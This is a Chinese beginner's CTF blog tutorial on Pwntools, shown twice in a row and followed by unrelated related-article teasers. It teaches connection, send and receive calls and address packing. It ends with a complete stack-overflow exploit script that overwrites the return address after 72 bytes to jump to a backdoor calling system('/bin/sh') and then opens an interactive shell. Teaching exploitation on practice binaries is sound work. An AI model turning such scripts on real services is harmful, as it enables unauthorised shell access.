写在前面在前面的几篇博客中我们已经学会了用objdump看汇编算出了偏移量是 72也理解了小端序和 64 位的传参规则。但现在我们一直在用终端手动输入字符调试这显然无法输入不可见的十六进制地址。今天我们将引入 PWN 界的最强神器 ——Pwntools。它是 Python 的一个 CTF 漏洞利用库能让我们用极其优雅的代码完成连接、发送 Payload 和获取 Shell 的全过程。 目录环境准备安装 Pwntools核心概念万物皆可p基础 API 详解连接、接收、发送地址打包神器p32与p64实战演练编写第一个完整 Exploit 脚本交互神器p.interactive()Week1 全程总结1. 环境准备安装 Pwntools在 WSL2/Ubuntu 终端中执行以下命令安装 Pwntools如果之前装 pwndbg 时没装的话# 更新软件源并安装 pip sudo apt update sudo apt install python3-pip -y # 安装 pwntools pip3 install pwntools安装完成后在终端输入python3进入交互环境输入from pwn import *。如果没有报错说明安装成功(首次导入可能会有些警告信息属于正常现象)。2. 核心概念万物皆可p在 Pwntools 中最常用的对象是p或者说io,r大家习惯叫它p。它代表了你与目标程序的连接通道。无论是本地执行一个程序还是远程连接一个 CTF 题目的服务器一旦建立了连接后续的发送和接收操作都是针对这个p进行的。3. 基础 API 详解3.1 建立连接本地打靶p process(./vuln)这会像你在终端输入./vuln一样启动一个本地进程并建立用于通信的管道。远程打靶p remote(127.0.0.1, 9999)这会通过 TCP 连接到指定 IP 和端口的目标程序通常用于打线上题。3.2 接收数据有时候程序会打印一些提示信息比如Please input:我们需要把这些信息接收下来确保程序执行到了我们想要的位置。p.recv()接收所有可用数据。p.recvline()接收一行数据遇到\n停止。p.recvuntil(Please input: )最常用一直接收数据直到遇到指定的字符串为止。这非常适合用来同步本地脚本和远程程序的执行流。3.3 发送数据把我们构造好的 Payload 发送过去。p.send(payload)直接发送数据不会自动加换行符。p.sendline(payload)发送数据并自动在末尾加上一个换行符\n。注意gets()函数遇到换行符才会结束读取所以打gets漏洞时通常用sendline而如果是read()函数通常用send。4. 地址打包神器p32与p64还记得我们讲过的小端序吗我们需要把0x401156这样的地址变成\x56\x11\x40\x00...才能放进 Payload 里。Pwntools 提供了自动转换的函数p32(0x401156)将整数打包为 32 位小端序字节流。p64(0x401156)将整数打包为 64 位小端序字节流。u32(b\x56\x11\x40\x00)解包把字节流转回整数用于信息泄露时还原地址。5. 实战演练编写第一个完整 Exploit 脚本让我们结合上一篇博客中分析的vuln程序偏移量 7264位程序写一个完整的攻击脚本假设我们在vuln.c中加了一个后门函数void secret() { system(/bin/sh); }我们通过objdump查到secret函数的地址是0x401156。我们要用栈溢出跳转到secret拿 Shell。新建一个文件exp.pyfrom pwn import * # 1. 设置运行环境架构可选但好习惯 context(archamd64, oslinux, log_leveldebug) # 2. 建立连接本地打靶 p process(./vuln) # 3. 构造 Payload offset 72 target_addr 0x401156 # 填充 72 字节垃圾数据后面跟上目标地址自动转小端序 payload bA * offset p64(target_addr) # 4. 接收程序的提示信息可选操作为了同步 # 假设 vuln.c 里有 printf(Please input: ); p.recvuntil(bPlease input: ) # 5. 发送 Payload p.sendline(payload) # 6. 进入交互模式 p.interactive()脚本解析context(...)设置环境为 64 位 Linux。log_leveldebug会让你在终端看到所有发送和接收的原始十六进制数据新手必开方便排错。bA * offset注意在 Python3 中字节串前面要加b。p.interactive()最神奇的一行代码。当 Payload 发送完毕如果成功劫持了控制流并执行了system(/bin/sh)这行代码会把你的终端控制权交给被攻击的程序。此时你可以直接在终端输入ls、cat flag.txt等命令就像直接 SSH 登录上去了一样6. 运行你的 Exploit在终端执行python3 exp.py如果一切顺利你会看到 Pwntools 打印出一堆 Debug 信息然后光标停住。此时你输入id或ls如果能返回结果恭喜你你成功完成了人生中第一次完整的 PWN如果你跟着我走到了这一步说明你已经具备了极强的学习能力和耐心。PWN 的大门已经向你敞开如果本系列文章对你有帮助请一键三连支持一下我们 Week2 见
【学习记录】Week1:Pwntools 基础——连接、接收与发送 Payload 实操
发布时间:2026/6/29 18:22:04
写在前面在前面的几篇博客中我们已经学会了用objdump看汇编算出了偏移量是 72也理解了小端序和 64 位的传参规则。但现在我们一直在用终端手动输入字符调试这显然无法输入不可见的十六进制地址。今天我们将引入 PWN 界的最强神器 ——Pwntools。它是 Python 的一个 CTF 漏洞利用库能让我们用极其优雅的代码完成连接、发送 Payload 和获取 Shell 的全过程。 目录环境准备安装 Pwntools核心概念万物皆可p基础 API 详解连接、接收、发送地址打包神器p32与p64实战演练编写第一个完整 Exploit 脚本交互神器p.interactive()Week1 全程总结1. 环境准备安装 Pwntools在 WSL2/Ubuntu 终端中执行以下命令安装 Pwntools如果之前装 pwndbg 时没装的话# 更新软件源并安装 pip sudo apt update sudo apt install python3-pip -y # 安装 pwntools pip3 install pwntools安装完成后在终端输入python3进入交互环境输入from pwn import *。如果没有报错说明安装成功(首次导入可能会有些警告信息属于正常现象)。2. 核心概念万物皆可p在 Pwntools 中最常用的对象是p或者说io,r大家习惯叫它p。它代表了你与目标程序的连接通道。无论是本地执行一个程序还是远程连接一个 CTF 题目的服务器一旦建立了连接后续的发送和接收操作都是针对这个p进行的。3. 基础 API 详解3.1 建立连接本地打靶p process(./vuln)这会像你在终端输入./vuln一样启动一个本地进程并建立用于通信的管道。远程打靶p remote(127.0.0.1, 9999)这会通过 TCP 连接到指定 IP 和端口的目标程序通常用于打线上题。3.2 接收数据有时候程序会打印一些提示信息比如Please input:我们需要把这些信息接收下来确保程序执行到了我们想要的位置。p.recv()接收所有可用数据。p.recvline()接收一行数据遇到\n停止。p.recvuntil(Please input: )最常用一直接收数据直到遇到指定的字符串为止。这非常适合用来同步本地脚本和远程程序的执行流。3.3 发送数据把我们构造好的 Payload 发送过去。p.send(payload)直接发送数据不会自动加换行符。p.sendline(payload)发送数据并自动在末尾加上一个换行符\n。注意gets()函数遇到换行符才会结束读取所以打gets漏洞时通常用sendline而如果是read()函数通常用send。4. 地址打包神器p32与p64还记得我们讲过的小端序吗我们需要把0x401156这样的地址变成\x56\x11\x40\x00...才能放进 Payload 里。Pwntools 提供了自动转换的函数p32(0x401156)将整数打包为 32 位小端序字节流。p64(0x401156)将整数打包为 64 位小端序字节流。u32(b\x56\x11\x40\x00)解包把字节流转回整数用于信息泄露时还原地址。5. 实战演练编写第一个完整 Exploit 脚本让我们结合上一篇博客中分析的vuln程序偏移量 7264位程序写一个完整的攻击脚本假设我们在vuln.c中加了一个后门函数void secret() { system(/bin/sh); }我们通过objdump查到secret函数的地址是0x401156。我们要用栈溢出跳转到secret拿 Shell。新建一个文件exp.pyfrom pwn import * # 1. 设置运行环境架构可选但好习惯 context(archamd64, oslinux, log_leveldebug) # 2. 建立连接本地打靶 p process(./vuln) # 3. 构造 Payload offset 72 target_addr 0x401156 # 填充 72 字节垃圾数据后面跟上目标地址自动转小端序 payload bA * offset p64(target_addr) # 4. 接收程序的提示信息可选操作为了同步 # 假设 vuln.c 里有 printf(Please input: ); p.recvuntil(bPlease input: ) # 5. 发送 Payload p.sendline(payload) # 6. 进入交互模式 p.interactive()脚本解析context(...)设置环境为 64 位 Linux。log_leveldebug会让你在终端看到所有发送和接收的原始十六进制数据新手必开方便排错。bA * offset注意在 Python3 中字节串前面要加b。p.interactive()最神奇的一行代码。当 Payload 发送完毕如果成功劫持了控制流并执行了system(/bin/sh)这行代码会把你的终端控制权交给被攻击的程序。此时你可以直接在终端输入ls、cat flag.txt等命令就像直接 SSH 登录上去了一样6. 运行你的 Exploit在终端执行python3 exp.py如果一切顺利你会看到 Pwntools 打印出一堆 Debug 信息然后光标停住。此时你输入id或ls如果能返回结果恭喜你你成功完成了人生中第一次完整的 PWN如果你跟着我走到了这一步说明你已经具备了极强的学习能力和耐心。PWN 的大门已经向你敞开如果本系列文章对你有帮助请一键三连支持一下我们 Week2 见
相关文章
gorm update部分字段 https://gitee.com/leijmdas/goweb3.git
文章摘要:本文介绍了基于Go语言的数据库操作实现,主要展示了两类更新方法:UpdateFields2Ret和UpdateFieldsWhere。前者通过主键值更新指定字段并返回影响行数,后者通过条件构造器实现条件更新。代码片段演示了用户表字段更新操作&…
别再熬夜写论文了!6款一键生成论文工具,一键极速生成超长篇幅!
别再做“学术裁缝”触碰学术不端风险了!本文解析论文写作新范式,介绍AI辅助原创、人机协同深化、全流程合规保障三大核心,并推荐6款免费AI论文工具,覆盖全流程生成、深度对话构思、理工科适配、范文参考、文献检索、学术润色翻译等…
如何高效解决macOS安全限制:SMAPI模组加载器完整配置方案
如何高效解决macOS安全限制:SMAPI模组加载器完整配置方案 【免费下载链接】SMAPI The modding API for Stardew Valley. 项目地址: https://gitcode.com/gh_mirrors/smap/SMAPI SMAPI(Stardew Modding API)是《星露谷物语》的官方模组…
揭秘:选址好选得好生意自然来
深夜十一点半,广州天河区某写字楼下的便利店依然亮着灯。刚加完班的白领小陈走进店里,扫码买了一杯热咖啡和一份三明治,不到一分钟便拎着东西离开。这家便利店并非24小时营业,但单日营业额却能达到周边同类店铺的两倍以上。房东老…
如何在通达信中实现缠论自动化分析:ChanlunX开源插件的完整指南
如何在通达信中实现缠论自动化分析:ChanlunX开源插件的完整指南 【免费下载链接】ChanlunX 缠中说禅炒股缠论可视化插件 项目地址: https://gitcode.com/gh_mirrors/ch/ChanlunX 缠论作为中国股市技术分析的重要理论体系,以其严谨的结构划分和精准…
VinXiangQi:基于YOLOv5的象棋AI连线工具完整指南
VinXiangQi:基于YOLOv5的象棋AI连线工具完整指南 【免费下载链接】VinXiangQi Xiangqi syncing tool based on Yolov5 / 基于Yolov5的中国象棋连线工具 项目地址: https://gitcode.com/gh_mirrors/vi/VinXiangQi 想要在象棋对弈中获得AI智能辅助吗࿱…
【2026最新】WPS2025下载保姆级安装图文教程(全网最详细)【附安装包+长期使用】
文章目录前言WPS2025安装前的准备WPS2025安装包下载WPS2025 安装教程(图文详解)WPS2025基础功能详解:文字、表格、演示三大组件快速上手前言 WPS2025的安装流程本身不算复杂,但网上很多教程写得比较跳跃,新手跟着做容…
QKeyMapper:5分钟解决你的Windows按键映射烦恼,手柄玩PC游戏不是梦!
QKeyMapper:5分钟解决你的Windows按键映射烦恼,手柄玩PC游戏不是梦! 【免费下载链接】QKeyMapper [按键映射工具] QKeyMapper,Qt开发Win10&Win11可用,不修改注册表、不需重新启动系统,可立即生效和停止…
【Web基础】HTTPS详解
目录 一. HTTPS是什么 二. 加密是什么 加密算法 三. HTTPS的工作过程 引入对称加密 引入非对称加密 为什么不只使用非对称加密传输数据? 中间人攻击 引入证书 证书是什么? 引入证书后的工作流程 常见问题 1. 黑客能否修改证书中的公钥&…
Java开发者转型安全开发:从代码审计到自动化工具实践
1. 转型背景与核心驱动力最近几年,身边不少做Java后端开发的朋友,都开始或多或少地关注起安全开发这个方向。我自己也是从写了七八年Java业务代码,一步步转向了安全领域,现在主要做代码审计和自动化安全工具开发。这个转变不是一时…
【TEE从入门到精通及实战】75 TEE内Wasm沙箱的内存安全:从“段错误”到“编译时保证”
75 TEE内Wasm沙箱的内存安全:从“段错误”到“编译时保证” 开篇故事 去年夏天,我正帮一家金融科技公司优化他们的TEE内Wasm沙箱。他们的核心业务是在Intel SGX enclave里运行用户提交的Wasm合约,用于实时交易验证。 一天下午,运维突然报警:生产环境的enclave进程频繁崩…
YAML函数动态解析:打造智能接口自动化测试用例
1. 项目概述:为什么YAML测试用例需要函数动态解析?在接口自动化测试的实践中,我们常常会面临一个核心矛盾:测试用例的可维护性与灵活性。早期的测试脚本,无论是用Python的unittest还是pytest,往往将测试数据…
AI Coding 六个月真实ROI账本:产品经理的血泪教训,研发的冷静忠告
6个月前的2025年12月,Boris Cherny 公开宣布自己卸载了 IDE。一时间,Vibe Coding 成了全行业最热的话题。6个月后,当我们回过头来拉一份真实账本,发现事情远没有"一句话生成一个App"那么浪漫。本文从产品经理和研发两个…
华为OD机试2025C卷-字符统计及重排[100分]( Java _ Python3 _ C++ _ C语言 _ JsNode _ Go)实现100%通过率
📫 个人主页:深夜coding算法 📣 专栏系列:2026年华为最新OD机试题库详解 🔥 一次订阅,永久解锁 | 持续更新100篇 | 6语言全覆盖 文章目录❄️前言:☀️一:题目描述🌙 题目…
华为OD机试2025C卷-寻找相同子串[100分]( Java _ Python3 _ C++ _ C语言 _ JsNode _ Go)实现100%通过率
📫 个人主页:深夜coding算法 📣 专栏系列:2026年华为最新OD机试题库详解 🔥 一次订阅,永久解锁 | 持续更新100篇 | 6语言全覆盖 文章目录❄️前言:☀️一:题目描述🌙 题目…
Zotero Duplicates Merger:5步彻底清理文献库重复条目
Zotero Duplicates Merger:5步彻底清理文献库重复条目 【免费下载链接】ZoteroDuplicatesMerger A zotero plugin to automatically merge duplicate items 项目地址: https://gitcode.com/gh_mirrors/zo/ZoteroDuplicatesMerger 还在为文献库中堆积如山的重…
利用随机有限集理论对蜂群的ILQR和MPC控制研究附Matlab代码
✅作者简介:热爱科研的Matlab仿真开发者,擅长数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。🍎 往期回顾关注个人主页:Matlab科研工作室🍊个人信条:格物致知,完整Matlab代码及仿真咨询…
为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因
更多请点击: https://intelliparadigm.com 第一章:为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因 Gemini邮件的客户转化效率(CTE)显著偏低,根本原因常被误判为…